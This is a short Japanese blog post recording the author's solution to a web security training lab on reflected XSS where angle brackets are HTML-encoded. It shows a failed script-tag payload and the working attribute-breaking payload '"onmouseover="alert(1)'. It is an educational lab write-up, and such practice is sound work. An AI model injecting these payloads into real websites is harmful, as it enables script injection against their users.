shikata ga nai

Private? There is no such things.

Reflected XSS into attribute with angle brackets HTML-encodedをやってみた

Hello there, ('ω')ノ

 

HTMLでエンコードされた<>属性に反映XSSを。

まずは、一般的なペイロードを。

入力したペイロードそのものが表示されて。

 <script>alert(1)</script>

 

f:id:ThisIsOne:20210223133401p:plain


リクエストを確認することに。

 

f:id:ThisIsOne:20210223133050p:plain

 

レスポンスを確認すると下記のようにエスケープ処理されいて。

 &lt;script&gt;alert(1)&lt;/script&gt;

 

f:id:ThisIsOne:20210223133147p:plain

 

というわけで<>属性を使用せずに実行する手段を入力するとクリアできた。

 "onmouseover="alert(1)

 

f:id:ThisIsOne:20210223133541p:plain

 

ちなみに今回のペイロードのレスポンスを確認すると以下のとおりで。

 &quot;onmouseover=&quot;alert(1)

 

f:id:ThisIsOne:20210223133707p:plain

 

Best regards, (^^ゞ

ひとりひとりの自覚をもった行動で、医療従事者と保健所職員を助けよう。

f:id:ThisIsOne:20200404115457p:plain